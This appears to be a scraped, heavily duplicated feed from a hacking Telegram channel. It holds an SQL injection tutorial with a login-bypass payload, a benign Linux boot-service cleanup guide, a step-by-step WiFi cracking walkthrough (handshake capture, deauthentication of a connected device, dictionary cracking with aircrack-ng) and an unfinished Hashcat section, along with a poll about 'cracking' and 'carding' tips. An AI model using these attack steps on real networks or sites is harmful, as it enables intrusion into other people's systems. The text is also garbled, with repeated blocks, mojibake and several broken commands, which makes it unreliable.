π¦ SQL INJECTION FOR BEGINERS FULL TUTORIAL
1) SQL injection is one of the more common network attack methods. Instead of using the BUG of the operating system to implement the attack, he aims at the negligence of the programmer when programming, through SQL statements, to achieve accountless login, or even tamper with the database.
2) When an application uses input to construct a dynamic SQL statement to access the database, a SQL injection attack occurs . If the code uses stored procedures, and these stored procedures are passed as strings containing unfiltered user input, SQL injection can also occur .
3) SQL injection may cause an attacker to use an application to log in and execute commands in the database. If the application uses an overprivileged account to connect to the database, this problem can become very serious. In some forms, the content entered by the user is directly used to construct dynamic SQL commands or used as input parameters of stored procedures. These forms are particularly vulnerable to SQL injection attacks. While many website programs are written, they do not judge the validity of user input or improper handling of variables in the program itself, which poses potential security risks to the application.
4) In this way, the user can submit a piece of database query code, obtain some sensitive information or control the entire server based on the results returned by the program, and SQL injection occurs.
π¦ The general idea of ββSQL injection attacks,
1) Find the location of SQL injection
2)Determine the server type and background database type
3) Perform SQL injection attacks against unsuitable server and database features
π¦ A simple example,
SQL> create table account(id number primary key, name varchar2(10), password varchar2(20));
Table created.
SQL> insert into account values(1, 'bisal', '111111');
1 row created.
SQL> commit;
Commit complete.
SQL> select * from account;
ID NAME PASSWORD
---------- ---------- --------------------
1 bisal 111111
SQL> select * from account where name='' or 1=1 -- and password='';
ID NAME PASSWORD
---------- ---------- --------------------
1 bisal 111111
After the condition, "username = 'xx' or 1 = 1", the user name is equal to "empty or1 = 1", because 1 = 1 is always ture, then this condition will succeed, in addition, add two "-" after this, this It means comments, it will comment the following statements, so that they will not work, so that the statements can always be executed correctly, and users can easily cheat the system and obtain a legal identity.
The reason for the SQL injection vulnerability is to splice SQL parameters. That is, the query parameters used for input are directly spliced ββinto the SQL statement, resulting in a SQL injection vulnerability. E.g,
select id, password from user where id = 2;
If the statement is obtained by stitching SQL strings, for example,
String sql = "select password from user where id =" + id;
Where id is a parameter entered by the user, then, if the user enters "2 or 1 = 1" to perform the SQL injection attack, the above statement (select id, password from user where id = 2 or 1 = 1;), All the records in the user table are found out, which is a typical SQL injection.
Imagine that if the user inputs some dangerous operations, such as drop table, the attack through SQL injection is not just a data leak, it may be a damage to the database.
π¦ As for the solution, someone summed it up,
1) Never trust user input. To verify the user's input, you can use regular expressions, or limit the length, convert single quotes and double "-", etc.
2) Never use dynamic assembly SQL, you can use parameterized SQL (bound variables) or directly use stored procedures for data query access.
3) Never use a database connection with administrator rights, use a separate database connection with limited rights for each application.
4) Do not store confidential information directly, encrypt or hash passwords and sensitive information.
1) SQL injection is one of the more common network attack methods. Instead of using the BUG of the operating system to implement the attack, he aims at the negligence of the programmer when programming, through SQL statements, to achieve accountless login, or even tamper with the database.
2) When an application uses input to construct a dynamic SQL statement to access the database, a SQL injection attack occurs . If the code uses stored procedures, and these stored procedures are passed as strings containing unfiltered user input, SQL injection can also occur .
3) SQL injection may cause an attacker to use an application to log in and execute commands in the database. If the application uses an overprivileged account to connect to the database, this problem can become very serious. In some forms, the content entered by the user is directly used to construct dynamic SQL commands or used as input parameters of stored procedures. These forms are particularly vulnerable to SQL injection attacks. While many website programs are written, they do not judge the validity of user input or improper handling of variables in the program itself, which poses potential security risks to the application.
4) In this way, the user can submit a piece of database query code, obtain some sensitive information or control the entire server based on the results returned by the program, and SQL injection occurs.
π¦ The general idea of ββSQL injection attacks,
1) Find the location of SQL injection
2)Determine the server type and background database type
3) Perform SQL injection attacks against unsuitable server and database features
π¦ A simple example,
SQL> create table account(id number primary key, name varchar2(10), password varchar2(20));
Table created.
SQL> insert into account values(1, 'bisal', '111111');
1 row created.
SQL> commit;
Commit complete.
SQL> select * from account;
ID NAME PASSWORD
---------- ---------- --------------------
1 bisal 111111
SQL> select * from account where name='' or 1=1 -- and password='';
ID NAME PASSWORD
---------- ---------- --------------------
1 bisal 111111
After the condition, "username = 'xx' or 1 = 1", the user name is equal to "empty or1 = 1", because 1 = 1 is always ture, then this condition will succeed, in addition, add two "-" after this, this It means comments, it will comment the following statements, so that they will not work, so that the statements can always be executed correctly, and users can easily cheat the system and obtain a legal identity.
The reason for the SQL injection vulnerability is to splice SQL parameters. That is, the query parameters used for input are directly spliced ββinto the SQL statement, resulting in a SQL injection vulnerability. E.g,
select id, password from user where id = 2;
If the statement is obtained by stitching SQL strings, for example,
String sql = "select password from user where id =" + id;
Where id is a parameter entered by the user, then, if the user enters "2 or 1 = 1" to perform the SQL injection attack, the above statement (select id, password from user where id = 2 or 1 = 1;), All the records in the user table are found out, which is a typical SQL injection.
Imagine that if the user inputs some dangerous operations, such as drop table, the attack through SQL injection is not just a data leak, it may be a damage to the database.
π¦ As for the solution, someone summed it up,
1) Never trust user input. To verify the user's input, you can use regular expressions, or limit the length, convert single quotes and double "-", etc.
2) Never use dynamic assembly SQL, you can use parameterized SQL (bound variables) or directly use stored procedures for data query access.
3) Never use a database connection with administrator rights, use a separate database connection with limited rights for each application.
4) Do not store confidential information directly, encrypt or hash passwords and sensitive information.
5) The application's exception information should give as few hints as possible. It is best to use a custom error message to wrap the original error message.
6) The detection method of SQL injection generally adopts auxiliary software or website platform to detect.
6) The detection method of SQL injection generally adopts auxiliary software or website platform to detect.
π¦ LEarning about SQL injection More for free :
1) Sqli-labs
Sqli-labs is a game tutorial written by an Indian programmer to learn SQL injection. It can be installed locally, accessed by a browser, and learn various SQL injection cases
https://github.com/Audi-1/sqli-labs
2)OWASP
Regarding information security, OWASP (Open Web Application Security Project) is an open source organization. There will be various open source projects that you can participate in or use with conditions. If you are interested, you can watch it.
http://www.owasp.org.cn/owasp-project
1) Sqli-labs
Sqli-labs is a game tutorial written by an Indian programmer to learn SQL injection. It can be installed locally, accessed by a browser, and learn various SQL injection cases
https://github.com/Audi-1/sqli-labs
2)OWASP
Regarding information security, OWASP (Open Web Application Security Project) is an open source organization. There will be various open source projects that you can participate in or use with conditions. If you are interested, you can watch it.
http://www.owasp.org.cn/owasp-project
GitHub
GitHub - Audi-1/sqli-labs: SQLI labs to test error based, Blind boolean based, Time based.
SQLI labs to test error based, Blind boolean based, Time based. - Audi-1/sqli-labs
π¦ WE SEND EVERYDAY NEW HACKING TIPS BUT WHAT YOU NEED US TO FOCUS ON ?
Final Results
44%
cracking ?
39%
carding ?
6%
scripts ?
11%
android ios tips ?
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Linux system boot items cleanup full by undercode
t.me/undercodeTesting
π¦ ππΌππ πππΈβπ :
1) In general, general-purpose Linux distributions start various related service processes at boot time, including many services that you may not need to use, such as Bluetooth bluetooth, Avahi, modem manager ModemManager, ppp-dns. : Here the author typo ppp-dns should be pppd-dns) and other service processes, what are these things? Where is it used and what function?
2) Systemd provides many good tools for viewing system startup, and can also control what runs when the system starts. In this article, I will explain how to shut down some annoying processes in the Systemd class distribution.
π¦ View boot items
In the past, you can easily see /etc/init.d which service processes will be started at boot time by looking at them. Systemd is displayed in different ways. You can use the following command to list the service processes that are allowed to start.
1) $ systemctl list-unit-files --type=service | grep enabled
accounts-daemon.service enabled
anacron-resume.service enabled
anacron.service enabled
bluetooth.service enabled
brltty.service enabled
[...]
2) At the top of this list, for me, the Bluetooth service is redundant, because I do nβt need to use Bluetooth on this computer, so I do nβt need to run this service. The following command will stop the service process, and make it not start at boot.
3) $ sudo systemctl stop bluetooth.service
4) $ sudo systemctl disable bluetooth.service
π¦You can use the following command to determine whether the operation was successful.
1) >< $ systemctl status bluetooth.service
bluetooth.service - Bluetooth service
Loaded: loaded (/lib/systemd/system/bluetooth.service; disabled; vendor preset: enabled)
Active: inactive (dead)
Docs: man:bluetoothd(8)
2)The deactivated service process can still be started by another service process. If you really want to not start the process when the system starts under any circumstances, you do nβt need to uninstall it, just cover it up to stop the process from booting under any circumstances.
3) $ sudo systemctl mask bluetooth.service
Created symlink from /etc/systemd/system/bluetooth.service to /dev/null.
4) Once you are satisfied that disabling the process to start without negative effects, you can also choose to uninstall the program.
π¦ The following service list can be obtained by executing the command:
1) $ systemctl list-unit-files --type=service
UNIT FILE STATE
accounts-daemon.service enabled
acpid.service disabled
alsa-restore.service static
alsa-utils.service masked
2) You cannot enable or disable static services, because static services are dependent on other processes, which does not mean that they run on their own.
π¦What services can be prohibited?
1) How do you know which services you need and which ones can be safely disabled? It always depends on your individual needs.
2) Here is an example of the role of several service processes. Many service processes are distribution-specific, so you should look at your distribution documentation (for example, via Google or StackOverflow).
3) accounts-daemon.service is a potential security risk. It is part of AccountsService, which allows programs to obtain or manipulate user account information. I don't think there are good reasons for me to allow such background operations, so I chose to mask the service process.
4) avahi-daemon.service is used for zero-configuration network discovery, making it easy for computers to discover printers or other hosts on the network. I always disable it and do nβt miss it.
<> brltty.service provides support for Braille devices, such as Braille displays.
π¦Linux system boot items cleanup full by undercode
t.me/undercodeTesting
π¦ ππΌππ πππΈβπ :
1) In general, general-purpose Linux distributions start various related service processes at boot time, including many services that you may not need to use, such as Bluetooth bluetooth, Avahi, modem manager ModemManager, ppp-dns. : Here the author typo ppp-dns should be pppd-dns) and other service processes, what are these things? Where is it used and what function?
2) Systemd provides many good tools for viewing system startup, and can also control what runs when the system starts. In this article, I will explain how to shut down some annoying processes in the Systemd class distribution.
π¦ View boot items
In the past, you can easily see /etc/init.d which service processes will be started at boot time by looking at them. Systemd is displayed in different ways. You can use the following command to list the service processes that are allowed to start.
1) $ systemctl list-unit-files --type=service | grep enabled
accounts-daemon.service enabled
anacron-resume.service enabled
anacron.service enabled
bluetooth.service enabled
brltty.service enabled
[...]
2) At the top of this list, for me, the Bluetooth service is redundant, because I do nβt need to use Bluetooth on this computer, so I do nβt need to run this service. The following command will stop the service process, and make it not start at boot.
3) $ sudo systemctl stop bluetooth.service
4) $ sudo systemctl disable bluetooth.service
π¦You can use the following command to determine whether the operation was successful.
1) >< $ systemctl status bluetooth.service
bluetooth.service - Bluetooth service
Loaded: loaded (/lib/systemd/system/bluetooth.service; disabled; vendor preset: enabled)
Active: inactive (dead)
Docs: man:bluetoothd(8)
2)The deactivated service process can still be started by another service process. If you really want to not start the process when the system starts under any circumstances, you do nβt need to uninstall it, just cover it up to stop the process from booting under any circumstances.
3) $ sudo systemctl mask bluetooth.service
Created symlink from /etc/systemd/system/bluetooth.service to /dev/null.
4) Once you are satisfied that disabling the process to start without negative effects, you can also choose to uninstall the program.
π¦ The following service list can be obtained by executing the command:
1) $ systemctl list-unit-files --type=service
UNIT FILE STATE
accounts-daemon.service enabled
acpid.service disabled
alsa-restore.service static
alsa-utils.service masked
2) You cannot enable or disable static services, because static services are dependent on other processes, which does not mean that they run on their own.
π¦What services can be prohibited?
1) How do you know which services you need and which ones can be safely disabled? It always depends on your individual needs.
2) Here is an example of the role of several service processes. Many service processes are distribution-specific, so you should look at your distribution documentation (for example, via Google or StackOverflow).
3) accounts-daemon.service is a potential security risk. It is part of AccountsService, which allows programs to obtain or manipulate user account information. I don't think there are good reasons for me to allow such background operations, so I chose to mask the service process.
4) avahi-daemon.service is used for zero-configuration network discovery, making it easy for computers to discover printers or other hosts on the network. I always disable it and do nβt miss it.
<> brltty.service provides support for Braille devices, such as Braille displays.
> debug-shell.service opens a huge security hole (the service provides a passwordless root shell to help debug systemd problems), unless you are using the service, otherwise never start the service.
> ModemManager.service is a daemon activated by dbus to provide a mobile broadband (2G / 3G / 4G) interface. If you do nβt have this interface, whether it βs a built-in interface, or a phone paired via Bluetooth, and USB Adapter, then you do not need the service.
> pppd-dns.service is a relic of computer development, if you use dial-up to access the Internet, keep it, otherwise you do not need it.
> rtkit-daemon.service sounds terrible, it sounds like a rootkit. But you need this service because it is a real-time kernel scheduler.
> whoopsie.service is an Ubuntu error reporting service. It is used to collect Ubuntu system crash reports and send reports
> wpa_supplicant.service is only required when you use Wi-Fi connection
written by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
> ModemManager.service is a daemon activated by dbus to provide a mobile broadband (2G / 3G / 4G) interface. If you do nβt have this interface, whether it βs a built-in interface, or a phone paired via Bluetooth, and USB Adapter, then you do not need the service.
> pppd-dns.service is a relic of computer development, if you use dial-up to access the Internet, keep it, otherwise you do not need it.
> rtkit-daemon.service sounds terrible, it sounds like a rootkit. But you need this service because it is a real-time kernel scheduler.
> whoopsie.service is an Ubuntu error reporting service. It is used to collect Ubuntu system crash reports and send reports
> wpa_supplicant.service is only required when you use Wi-Fi connection
written by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Kali Linux crack WiFi tutorial full by undercode :
> Cracking WiFi is a relatively simple operation of kali. The most important thing to crack WiFi is to have a good dictionary. I take the rockyou dictionary that comes with Kali Linux as an example, located at /user/share/wordlists/rockyou.txt.gz.
π¦ Unzip before use:
# gzip -d /usr/share/wordlists/rockyou.txt.gz
Without further ado, the tutorial begins.
1) Check if the network card supports monitoring mode.
Enter in the terminal: airmon-ng
The wireless network cards that support monitor mode are listed above. You can see that wlan0 supports monitor mode
2) Turn on the monitor mode.
Enter in the terminal: airmon-ng start wlan0
π¦Kali Linux crack WiFi tutorial full by undercode :
> Cracking WiFi is a relatively simple operation of kali. The most important thing to crack WiFi is to have a good dictionary. I take the rockyou dictionary that comes with Kali Linux as an example, located at /user/share/wordlists/rockyou.txt.gz.
π¦ Unzip before use:
# gzip -d /usr/share/wordlists/rockyou.txt.gz
Without further ado, the tutorial begins.
1) Check if the network card supports monitoring mode.
Enter in the terminal: airmon-ng
The wireless network cards that support monitor mode are listed above. You can see that wlan0 supports monitor mode
2) Turn on the monitor mode.
Enter in the terminal: airmon-ng start wlan0
if The wireless network cards that support monitor mode You can see that wlan0 supports monitor mode
3) Turn on the monitor mode.
> Enter in the terminal: airmon-ng start wlan0
After successful execution, the NIC interface becomes wlan0mon; you can use the ifconfig command to view it.
4) Check the WiFi network.
Enter in the terminal: airodump-ng wlan0mon
At this time, the surrounding wifi and their detailed information will be listed, including signal strength, encryption type, channel, etc. Remember to crack the wifi channel number and BSSID. Press Ctrl-C to end.
5) Grab the handshake packet.
Start packet capture: airodump-ng -c6 --bssidBC: 46: 99: 66: F9: 84 -w ~ / wlan0mon
Parameter explanation:
-c specifies the channel number
--Bssid specifies the router bssid
-w specifies where to save the captured packets
Note the spaces here.
6) Force the device connected to wifi to reconnect to the router
After step 4, we need to wait for the user to connect / reconnect to the wifi to capture the package. At this time, it may take a long time, because there must be a new user to connect to the WiFi, so we need to force the user to connect to the WiFi. There is a tool called aireplay-ng in kali, which can force users to disconnect the wifi connection; the principle is to send a deauth (anti-authentication) packet to a device connected to the wifi and let that device disconnect the wifi, then it will naturally Connect to wifi again.
6)However, the effective premise of aireplay-ng is that there is at least one connected device in the wifi network. From the above picture (3) you can see which devices are connected to wifi, STATION is the MAC address of the connected device, remember one.
Open the new terminal and execute: aireplay-ng -02 -a 46: 99: 66: F9: 84 -c B8: E8: 56: 09: CC: 9C wlan0mon
Parameter explanation:
-0 means to launch a deauthentication attack
-a specifies the wireless router BSSID
-c specifies a device to be forcibly disconnected
Note the code spaces here.
3) Turn on the monitor mode.
> Enter in the terminal: airmon-ng start wlan0
After successful execution, the NIC interface becomes wlan0mon; you can use the ifconfig command to view it.
4) Check the WiFi network.
Enter in the terminal: airodump-ng wlan0mon
At this time, the surrounding wifi and their detailed information will be listed, including signal strength, encryption type, channel, etc. Remember to crack the wifi channel number and BSSID. Press Ctrl-C to end.
5) Grab the handshake packet.
Start packet capture: airodump-ng -c6 --bssidBC: 46: 99: 66: F9: 84 -w ~ / wlan0mon
Parameter explanation:
-c specifies the channel number
--Bssid specifies the router bssid
-w specifies where to save the captured packets
Note the spaces here.
6) Force the device connected to wifi to reconnect to the router
After step 4, we need to wait for the user to connect / reconnect to the wifi to capture the package. At this time, it may take a long time, because there must be a new user to connect to the WiFi, so we need to force the user to connect to the WiFi. There is a tool called aireplay-ng in kali, which can force users to disconnect the wifi connection; the principle is to send a deauth (anti-authentication) packet to a device connected to the wifi and let that device disconnect the wifi, then it will naturally Connect to wifi again.
6)However, the effective premise of aireplay-ng is that there is at least one connected device in the wifi network. From the above picture (3) you can see which devices are connected to wifi, STATION is the MAC address of the connected device, remember one.
Open the new terminal and execute: aireplay-ng -02 -a 46: 99: 66: F9: 84 -c B8: E8: 56: 09: CC: 9C wlan0mon
Parameter explanation:
-0 means to launch a deauthentication attack
-a specifies the wireless router BSSID
-c specifies a device to be forcibly disconnected
Note the code spaces here.
π¦Press Ctrl-C to end the packet capture.
We have obtained the desired handshake packet, and we can end the monitoring mode of the wireless network card:
We have obtained the desired handshake packet, and we can end the monitoring mode of the wireless network card:
7) Start cracking the password.
Enter in the terminal: aircrack-ng- a2 -b C8: 3A: 35: 30: 3E: C8 -w /usr/share/wordlists/rockyou.txt~/*.cap
Parameter explanation:
-a2 represents the WPA handshake packet
-b specifies the wifi BSSID to be cracked.
-w specifies the dictionary file
-The last is the grabbed package.
8) Then just wait, maybe a few minutes, maybe a few hours, depending on the computer performance and the complexity of the password. If it is unsuccessful, you can crack other Baidu dictionaries.
Enter in the terminal: aircrack-ng- a2 -b C8: 3A: 35: 30: 3E: C8 -w /usr/share/wordlists/rockyou.txt~/*.cap
Parameter explanation:
-a2 represents the WPA handshake packet
-b specifies the wifi BSSID to be cracked.
-w specifies the dictionary file
-The last is the grabbed package.
8) Then just wait, maybe a few minutes, maybe a few hours, depending on the computer performance and the complexity of the password. If it is unsuccessful, you can crack other Baidu dictionaries.
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Use Hashcat to brute force crack the password hash
1) In recent years, the development of graphics cards has changed dramatically; they now contain hundreds or thousands of processors inside the chip, all of which work in parallel.
2) When applied to password cracking, this means that if a single processor can calculate 10,000 hashes in one second, a GPU with 1,000 cores can reach 10 million. This means reducing the cracking time by 1,000 times or more. In this chapter, we will use Hashcat to brute force the hash.
3) But this feature is only effective if you install KaliLinux as a basic system on a computer with Nvidia or ATI chipset. If you install Kali Linux on a virtual machine, GPU cracking may not work, but you can install Hashcat on the host. There are Windows and Linux versions (https://hashcat.net/hashcat/).
π¦ Environmental preparation
You need to ensure that the graphics drivers are installed correctly and that Hashcat is compatible with them, so you need to do the following:
1) Run Hashcat independently; it will tell you if there is a problem: hashcat
2) Test the hash rate of each algorithm it supports in benchmark mode hashcat --benchmark
3) Depending on your installation, you may need to force Hashcat to use your specific graphics card: hashcat --benchmark --force
π¦ Combat drill
let's crack a hash value. Take the administrator's hash
π¦ Use Hashcat to brute force crack the password hash
1) In recent years, the development of graphics cards has changed dramatically; they now contain hundreds or thousands of processors inside the chip, all of which work in parallel.
2) When applied to password cracking, this means that if a single processor can calculate 10,000 hashes in one second, a GPU with 1,000 cores can reach 10 million. This means reducing the cracking time by 1,000 times or more. In this chapter, we will use Hashcat to brute force the hash.
3) But this feature is only effective if you install KaliLinux as a basic system on a computer with Nvidia or ATI chipset. If you install Kali Linux on a virtual machine, GPU cracking may not work, but you can install Hashcat on the host. There are Windows and Linux versions (https://hashcat.net/hashcat/).
π¦ Environmental preparation
You need to ensure that the graphics drivers are installed correctly and that Hashcat is compatible with them, so you need to do the following:
1) Run Hashcat independently; it will tell you if there is a problem: hashcat
2) Test the hash rate of each algorithm it supports in benchmark mode hashcat --benchmark
3) Depending on your installation, you may need to force Hashcat to use your specific graphics card: hashcat --benchmark --force
π¦ Combat drill
let's crack a hash value. Take the administrator's hash
hashcat.net
hashcat - advanced password recovery
World's fastest and most advanced password recovery utility